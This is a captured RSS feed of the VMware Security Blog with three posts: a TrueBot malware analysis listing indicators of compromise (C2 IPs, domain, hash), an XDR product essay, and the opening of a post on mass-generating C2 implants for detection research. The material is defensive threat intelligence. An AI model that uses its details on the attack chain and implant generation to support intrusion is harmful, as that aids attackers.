feeds.feedburner.com
2404:6800:4017:804::200e
URL:
http://feeds.feedburner.com/VmwareSecurityComplianceBlog
Submission: On June 15 via manual from SG — Scanned from SG
Form analysis: 0 forms found in the DOM

Text Content

VMware Security Blog
https://blogs.vmware.com/security
Mon, 05 Jun 2023 15:58:31 +0000
en-US, hourly, 1
https://wordpress.org/?v=6.1.1

Carbon Black’s TrueBot Detection
https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection
Thu, 01 Jun 2023 18:34:42 +0000
https://blogs.vmware.com/security/?p=83485

Going from E to X in Detection & Response
https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response
Thu, 04 May 2023 19:36:51 +0000
https://blogs.vmware.com/security/?p=83474

It’s Raining Implants: How to Generate C2 Framework Implants At Scale
https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale
Thu, 27 Apr 2023 15:00:49 +0000
https://blogs.vmware.com/security/?p=83464

VMware Response to CVE-2023-29552 – Reflective Denial-of-Service (DoS) Amplification Vulnerability in SLP
https://blogs.vmware.com/security/2023/04/vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp.html?utm_source=rss&utm_medium=rss&utm_campaign=vmware-response-to-cve-2023-29552-reflective-denial-of-service-dos-amplification-vulnerability-in-slp
Tue, 25 Apr 2023 14:08:33 +0000
https://blogs.vmware.com/security/?p=83452

Bring Your Own Backdoor: How Vulnerable Drivers Let Hackers In
https://blogs.vmware.com/security/2023/04/bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in.html?utm_source=rss&utm_medium=rss&utm_campaign=bring-your-own-backdoor-how-vulnerable-drivers-let-hackers-in
Wed, 19 Apr 2023 17:56:42 +0000
https://blogs.vmware.com/security/?p=83445

XDR: Identity Matters – Who You Know is As Important as What You Know
https://blogs.vmware.com/security/2023/04/xdr-identity-matters-who-you-know-is-as-important-as-what-you-know.html?utm_source=rss&utm_medium=rss&utm_campaign=xdr-identity-matters-who-you-know-is-as-important-as-what-you-know
Tue, 18 Apr 2023 15:00:02 +0000
https://blogs.vmware.com/security/?p=83441

Investigating 3CX Desktop Application Attacks: What You Need to Know
https://blogs.vmware.com/security/2023/03/investigating-3cx-desktop-application-attacks-what-you-need-to-know.html?utm_source=rss&utm_medium=rss&utm_campaign=investigating-3cx-desktop-application-attacks-what-you-need-to-know
Fri, 31 Mar 2023 16:59:31 +0000
https://blogs.vmware.com/security/?p=83435

Embedded vSphere Harbor default enablement results in an insecure configuration
https://blogs.vmware.com/security/2023/03/embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration.html?utm_source=rss&utm_medium=rss&utm_campaign=embedded-vsphere-harbor-default-enablement-results-in-an-insecure-configuration
Fri, 31 Mar 2023 05:23:42 +0000
https://blogs.vmware.com/security/?p=83429

How to Detect PoshC2 PowerShell Implants
https://blogs.vmware.com/security/2023/03/how-to-detect-poshc2-powershell-implants.html?utm_source=rss&utm_medium=rss&utm_campaign=how-to-detect-poshc2-powershell-implants
Fri, 24 Mar 2023 21:03:01 +0000
https://blogs.vmware.com/security/?p=83405

Unveiling the Evolution of Royal Ransomware
https://blogs.vmware.com/security/2023/03/unveiling-the-evolution-of-royal-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=unveiling-the-evolution-of-royal-ransomware
Thu, 16 Mar 2023 20:11:57 +0000
https://blogs.vmware.com/security/?p=83390

Document tree
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" version="2.0"> <channel> <title>VMware Security Blog</title> <atom:link href="https://blogs.vmware.com/security/feed" rel="self" type="application/rss+xml"/> <link>https://blogs.vmware.com/security</link> <description/> <lastBuildDate>Mon, 05 Jun 2023 15:58:31 +0000</lastBuildDate> <language>en-US</language> <sy:updatePeriod> hourly </sy:updatePeriod> <sy:updateFrequency> 1 </sy:updateFrequency> <generator>https://wordpress.org/?v=6.1.1</generator> <item> <title>Carbon Black’s TrueBot Detection</title> <link>https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html?utm_source=rss&utm_medium=rss&utm_campaign=carbon-blacks-truebot-detection</link> <dc:creator> <![CDATA[ Fae Carlisle ]]> ... </dc:creator> <pubDate>Thu, 01 Jun 2023 18:34:42 +0000</pubDate> <category> <![CDATA[ Threat Analysis Unit ]]> ... 
</category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83485</guid> <description> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png 300w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png 1710w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been seen since at least 2017. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery. 
In this article, we will break down what … <a href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon Black’s TrueBot Detection</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </description> <content:encoded> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/03/Malware_Featured-300x162.png 300w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1024x555.png 1024w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-768x416.png 768w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-1536x832.png 1536w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-410x222.png 410w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-600x325.png 600w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-415x225.png 415w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-585x318.png 585w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-380x207.png 380w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured-222x120.png 222w, https://blogs.vmware.com/security/files/2022/03/Malware_Featured.png 1710w" sizes="(max-width: 300px) 100vw, 300px" /></div><p>VMware’s Carbon Black Managed Detection and Response (MDR) team began seeing a surge of TrueBot activity in May 2023. TrueBot, otherwise known as Silence.Downloader has been seen since at least 2017. TrueBot is under active development by Silence, with recent versions using a Netwrix vulnerability for delivery. 
In this article, we will break down what we have seen in customers’ environments and how Carbon Black MDR detects and responds to the threat.</p> <h2>History</h2> <p>Just as its name suggests, TrueBot is a downloader trojan botnet that uses command and control servers to collect information on compromised systems and uses that compromised system as a launching point for further attacks, as seen recently with Clop Ransomware.</p> <p>TrueBot was known for using malicious emails to drop their malware but was recently seen using a Netwrix vulnerability as their delivery method. VMware’s MDR team has seen this vulnerability used firsthand in customer environments, as explored below. TrueBot is also using Raspberry Robin (a worm) as a delivery vector.</p> <p>While Silence Group is known for targeting banks and financial institutions, TrueBot has also been seen targeting the education sector. In the Carbon Black Detection & Notable Attacks section, we break down the sectors that we have seen targeted from our platform.</p> <h2>Attribution</h2> <p>Though a threat actor group called Silence Group is attributed to this malware, Group-IB has linked the group with Russia’s EvilCorp (Indrik Spider) due to the downloaders they use being similar. The MDR team has explored this link and has not found substantial evidence to back this claim.</p> <p>Researchers thought EvilCorp to be linked to TrueBot due to TrueBot dropping FlawedGrace. FlawedGrace is malware that is attributed to EvilCorp. Though TrueBot drops this payload, the malware operators could purchase access to this tool directly from EvilCorp. Another link explored was TrueBot dropping Clop Ransomware, which was previously used by EvilCorp. However, Clop is ransomware-as-a-service, so anyone can purchase access to this tool. Lastly, Silence is a Russian-speaking cybercriminal group that uses Russian web hosting services. 
Though EvilCorp is also Russian, this is not strong evidence to link the two, as there are dozens of Russian APTs.</p> <p>Due to these findings, we cannot say for sure whether EvilCorp and TrueBot are connected.</p> <h2>Carbon Black Detection</h2> <p>Carbon Black is very effective at detecting TrueBot and its associated activity. This section will focus on what Carbon Black detected and the visibility into the attack process.</p> <p><a href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83489" src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png" alt="" width="900" height="120" srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1024x137.png 1024w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-300x40.png 300w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-768x102.png 768w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-1536x205.png 1536w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM-600x80.png 600w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.27.03-AM.png 1920w" sizes="(max-width: 900px) 100vw, 900px" /></a></p> <p><em>Figure 1.1 Process Chain</em></p> <p>The infection appeared to have started with a drive-by-download from Chrome for the executable ‘update.exe’.</p> <p><a href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83488" src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png" alt="" width="800" height="198" srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-1024x253.png 
1024w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-300x74.png 300w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-768x190.png 768w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM-600x148.png 600w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.26.09-AM.png 1132w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.2 Update.exe being downloaded</i></p> <p>A user had to click on this in order to execute the malware. Upon execution, the malware immediately begins to look for EDR and antivirus software.</p> <p><a href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83487" src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png" alt="" width="800" height="157" srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-1024x201.png 1024w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-300x59.png 300w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-768x151.png 768w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM-600x118.png 600w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.25.33-AM.png 1038w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.3 Looking for EDR/AV</i></p> <p>Once executed, it connected to 94[.]142.138.61IP, which is a Russian IP address that is known to be attributed to TrueBot. 
At the address, the executable ‘3ujwy2rz7v.exe’ was downloaded and then launched by cmd.exe.</p> <p><a href="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83486" src="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png" alt="" width="800" height="274" srcset="https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-1024x351.png 1024w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-300x103.png 300w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-768x263.png 768w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM-600x206.png 600w, https://blogs.vmware.com/security/files/2023/06/Screen-Shot-2023-06-01-at-11.24.41-AM.png 1184w" sizes="(max-width: 800px) 100vw, 800px" /></a></p> <p><i>Figure 1.4 3ujwy2rz7v.exe activity</i></p> <p>The executable then connected to the C2 domain name ‘dremmfyttrred[.]com’.</p> <p>The activity thereafter included dumps of LSASS, exfiltration of data, and system and process enumerations.</p> <p>Managed Detection and Response stops this activity through first the detection of the activity and then the implementation of system quarantines, hash banning, policy reviews, and policy modifications. 
Customers are informed of the observed activity and actions taken by the team every step of the way.</p> <h2>Indicators of Compromise</h2> <ul> <li aria-level="1">45.182.189[.]103</li> <li aria-level="1">Dremmfyttrred.com</li> <li aria-level="1">94.142.138[.]61</li> <li aria-level="1">Locations: Russia, Panama</li> <li aria-level="1">Update.exe</li> <li aria-level="1">Document_26_apr_2443807.exe</li> <li aria-level="1">fe746402c74ac329231ae1b5dffa8229b509f4c15a0f5085617f14f0c1579040</li> <li aria-level="1">172.64.155[.]188</li> <li aria-level="1">104.18.32[.]68</li> <li aria-level="1">3ujwy2rz7v.exe</li> </ul> <h2>Summary</h2> <p>TrueBot can be a particularly nasty infection for any network. When an organization is infected with this malware, it can quickly escalate to become a bigger infection, similar to how ransomware spreads throughout a network. Carbon Black is able to quickly detect TrueBot and its associated activity and, with the help of MDR, be able to detect and contain it early in the attack chain before the threat escalates.</p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/06/carbon-blacks-truebot-detection.html">Carbon Black’s TrueBot Detection</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... </item> <item> <title>Going from E to X in Detection & Response</title> <link>https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html?utm_source=rss&utm_medium=rss&utm_campaign=going-from-e-to-x-in-detection-response</link> <dc:creator> <![CDATA[ Simon Perry ]]> ... </dc:creator> <pubDate>Thu, 04 May 2023 19:36:51 +0000</pubDate> <category> <![CDATA[ Modern Apps Security ]]> ... 
</category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83474</guid> <description> <![CDATA[ <div><img width="300" height="169" src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg 300w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg 1024w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg 768w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg 1536w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg 2048w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg 600w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>The first SOC I toured was that of a major US bank, circa 2000. That SOC, and the many others I’ve stepped foot in since relied heavily on a SIEM to play the twin roles of centralized data collection and correlation. Later SOAR platforms were developed as richer and more capable automation engines, based on … <a href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going from E to X in Detection & Response</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... 
</description> <content:encoded> <![CDATA[ <div><img width="300" height="169" src="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-300x169.jpg 300w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1024x576.jpg 1024w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-768x432.jpg 768w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-1536x864.jpg 1536w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-2048x1152.jpg 2048w, https://blogs.vmware.com/security/files/2023/01/300DPIxGettyImages-13362507991-600x338.jpg 600w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span data-contrast="auto">The first SOC I toured was that of a major US bank, circa 2000. That SOC, and the many others I’ve stepped foot in since relied heavily on a SIEM to play the twin roles of centralized data collection and correlation. Later SOAR platforms were developed as richer and more capable automation engines, based on the SIEM data set.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">However, being log-driven SIEM/SOARs are wholly reliant on an upstream control (firewall, etc.) reliably detecting anomalous activity and logging an event to the SIEM. Attackers focus keenly on avoiding such detection. Visibility gaps are all too common, and through those gaps and blind spots, attackers slip to steal, disrupt, and destroy. It has become increasingly obvious that SIEMs are reliable platforms for the sort of information called for by compliance requirements, but are sadly lacking as a primary, front-line tool for threat detection and threat hunting. 
</span><span data-ccp-props="{}"> </span></p> <h2>Enter EDR</h2> <p><span data-contrast="auto">The only constant in security is change; attackers research and employ new TTPs while defenders develop deeper skills, new processes, and better tools. One such game-changing tool developed to provide defenders with a far richer telemetry set than defenders ever enjoyed before was EDR. Carbon Black invented and shipped to market the first commercial EDR even before Gartner Analyst Anton Chuvakin “named” the market segment back in 2013</span><span data-contrast="auto">. EDR shone a light into the details of what attackers were attempting to do on an endpoint and server, eliminating a dangerous blind spot where 40% of attacks start and end.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">EDR’s place as a foundation for the modern SOC is now almost universally recognized, and its ability to gather and analyze detailed telemetry to detect anomalous behavior on endpoints has been modeled and applied to the realms of the network and identity. It is not unusual to find in more mature SOCs network detection (typically standalone NDR and PCAP tools), and identity analysis (usually UEBA) deployed alongside EDR (and the still ubiquitous SIEM/SOAR). 
</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">The challenge though for the typical SOC is twofold: firstly that until now capture and analysis of network traffic typically required expensive hardware in the form of packet brokers and network taps; and secondly the burden of bringing together three different and disparate data sources (EDR, network, and identity) and effectively using them to detect and respond to an attack early and accurately fell on the shoulders of the SOC Analyst, leading to stress, burnout, and missed signals.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Together endpoint, network, and identity telemetry provide a powerful detective triad for SOC Analysts to use to find attacks, but defenders need a better way than to rely on standalone EDR, NDR, and UEBA. </span><span data-ccp-props="{}"> </span></p> <h2>Enter XDR<span data-ccp-props="{}"><br /> </span></h2> <p><span data-contrast="auto">XDR (E</span><span data-contrast="auto">x</span><span data-contrast="auto">tended </span><span data-contrast="auto">D</span><span data-contrast="auto">etection & </span><span data-contrast="auto">R</span><span data-contrast="auto">esponse) provides the means to combine endpoint, network, and identity data. XDR is the logical next step from EDR and delivers enrichment of captured data by mapping it to the MITRE ATT&CK framework of TTPs and adding appropriate meta-data tags, the correlation across the three data types, and automatic response to an alert. XDR also provides a deep, broad, and forensically useful data trail useful for root cause analysis of an attack.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Like any new tool introduced by our industry, XDR is often “different things to different people” and there remains some confusion as to what XDR is and is not. 
Let’s clear that up.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">XDR does not replace the SIEM/SOAR, which remains useful as a central data store for compliance reporting and for some forensic activities. Organizations have typically invested significant time, effort, and money in the operationalization of SIEM and SOAR. It is unreasonable to expect that they will rip and replace the SIEM and SOAR to achieve XDR. </span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Nor should XDR require the addition of yet more disparate tools. A shocking statistic is that on average a typical organization has 47 security tools deployed, and 70% have added five tools in the last twelve months. Considering that trend it ought not be surprising that 95% of attacks involve a vulnerability or blind spot available to the attacker to exploit due to misconfiguration and misalignment between the many controls </span><span data-contrast="auto">2</span><span data-contrast="auto">. Further, I would argue that anyone new security control needs to replace two or more existing controls; we need to simplify and improve the SOC Analyst experience, not add to the confusion and the management burden.</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In delivering </span><a href="https://carbonblack.vmware.com/carbon-black-xdr-activity-path"><span data-contrast="auto">VMware </span><span data-contrast="none">Carbon Black XDR</span></a><span data-contrast="auto"> to market we have built on our legacy as a pioneer in EDR. Carbon Black XDR transforms a fleet of endpoints into a distributed mesh of network sensors, each collecting endpoint, network, and identity telemetry, streaming that to the Carbon Black Cloud where we natively correlate, enrich, and analyze these three data sources. 
All without network configuration changes, without the need for expensive network taps and packet brokers, both of which are architecturally unsuited for the post-COVID, distributed workforce, and multi-cloud world we now live in. </span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Carbon Black XDR provides the SOC Analyst more visibility. Our approach to XDR adds network and identity telemetry to the existing EDR data, providing the means to identify hidden & highly sophisticated attacks. Carbon Black XDR speeds Mean Time To Detect and Respond (MTTD/MTTR) and allows the SOC to better track and understand attacks that target multiple systems. Importantly, Carbon Black XDR is by design an open ecosystem; integrating with and adding value to the existing SIEM and SOAR, and follows a design philosophy that there will be third-party tools and additional data sources that will further extend XDR. </span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">In summary; XDR builds on and is a natural and logical extension to EDR. It neither replaces SIEM/SOAR nor should require you to add yet more disparate tools. In fact, the idea of relying on hardware tap-based approaches to capturing network traffic just doesn’t work today, given our approach to production workload architecture and to the way end users connect from anywhere. </span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">You may hear varying definitions of XDR over the coming months as this industry sector gains prominence. To cut through all that just keep asking the same two questions: “Will I be required to add more complexity and burden to my SOC by adding more tools?”; and “Am I being asked to rip and replace trusted tools that I have already invested so much in?”. 
</span><span data-ccp-props="{}"> </span></p> <p><span data-contrast="auto">Improving the SOC Analyst experience requires an evolution from EDR to XDR, but at VMware Carbon Black we don’t believe it should require a change to everything you do.</span><span data-ccp-props="{}"> </span></p><p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/05/going-from-e-to-x-in-detection-response.html">Going from E to X in Detection & Response</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> ... </content:encoded> ... </item> <item> <title>It’s Raining Implants: How to Generate C2 Framework Implants At Scale</title> <link>https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html?utm_source=rss&utm_medium=rss&utm_campaign=its-raining-implants-how-to-generate-c2-framework-implants-at-scale</link> <dc:creator> <![CDATA[ Sebastiano Mariani ]]> ... </dc:creator> <pubDate>Thu, 27 Apr 2023 15:00:49 +0000</pubDate> <category> <![CDATA[ Threat Analysis Unit ]]> ... </category> <guid isPermaLink="false">https://blogs.vmware.com/security/?p=83464</guid> <description> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div> <p>Command-and-control (C2) frameworks serve as a means to remotely manage and access compromised devices. They allow for the creation of various payload types, called implants, that are dropped on victim machines by attackers, enabling them to retain access and control over the infected victim. 
While legitimate penetration testing utilizes C2 frameworks to evaluate system security … <a href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">Continued</a></p> <p>The post <a rel="nofollow" href="https://blogs.vmware.com/security/2023/04/its-raining-implants-how-to-generate-c2-framework-implants-at-scale.html">It’s Raining Implants: How to Generate C2 Framework Implants At Scale</a> appeared first on <a rel="nofollow" href="https://blogs.vmware.com/security">VMware Security Blog</a>.</p> ]]> </description> <content:encoded> <![CDATA[ <div><img width="300" height="162" src="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png" class="attachment-medium size-medium wp-post-image" alt="" decoding="async" loading="lazy" style="margin-bottom: 10px;" srcset="https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222-300x162.png 300w, https://blogs.vmware.com/security/files/2022/05/Threat-Analysis-Unit_410x222.png 410w" sizes="(max-width: 300px) 100vw, 300px" /></div><p><span data-contrast="none">Command-and-control (C2) frameworks serve as a means to remotely manage and access compromised devices. They allow for the creation of various payload types, called implants, that are dropped on victim machines by attackers, enabling them to retain access and control over the infected victim.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">While legitimate penetration testing utilizes C2 frameworks to evaluate system security and identify potential attacks, cyber-criminals have also taken advantage of these tools for malicious purposes. 
The likes of Cobalt Strike, Metasploit, and Brute Ratel have become increasingly popular in breaching enterprise networks.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">For a better understanding of how C2 frameworks operate, refer to </span><span data-contrast="auto">Figure 1</span><span data-contrast="none">, which presents a simplified scenario of a compromised machine.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-ccp-props="{"134245418":true,"201341983":0,"335551550":2,"335551620":2,"335559739":160,"335559740":259}"><a href="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png"><img decoding="async" loading="lazy" class="alignnone wp-image-83465" src="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png" alt="" width="800" height="696" srcset="https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-1024x891.png 1024w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-300x261.png 300w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-768x669.png 768w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM-600x522.png 600w, https://blogs.vmware.com/security/files/2023/04/Screen-Shot-2023-04-26-at-2.58.44-PM.png 1220w" sizes="(max-width: 800px) 100vw, 800px" /></a></span></p> <p><i><span data-contrast="none">Figure </span></i><i><span data-contrast="none">1</span></i><i><span data-contrast="none">: How C2 frameworks operate.</span></i><span data-ccp-props="{"201341983":0,"335551550":2,"335551620":2,"335559739":200,"335559740":240}"> </span></p> <p><span data-contrast="none">Appropriate firewall configurations and robust 
endpoint protection systems can aid in preventing scenarios like this, but attackers can customize implants to increase the likelihood of flying under the radar. For instance, attackers can modify network traffic to resemble legitimate communication with the C2 server or modify the binary footprint of the implant through a parametric generation process. However, the possibility to create implants using various configuration options can be leveraged by security researchers to create a vast dataset of samples and study their invariants. </span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">This blog post builds on the aforementioned idea and aims to explore the potential of exploiting the polymorphic capabilities of these implants to create a large dataset of samples. This dataset will then be analyzed using a machine learning pipeline to identify any invariants that can be used to improve our defenses against these attacks.</span><span data-ccp-props="{"201341983":0,"335559739":160,"335559740":259}"> </span></p> <p><span data-contrast="none">To achieve this goal, we developed a framework, called C2F2, that abstracts the underlying C2 framework and automatically generates C2 implants with randomized options by iteratively changing the settings used at configuration time. This process is repeated for each C2 framework, leading up to a diversified yet representative dataset of malicious implants. 
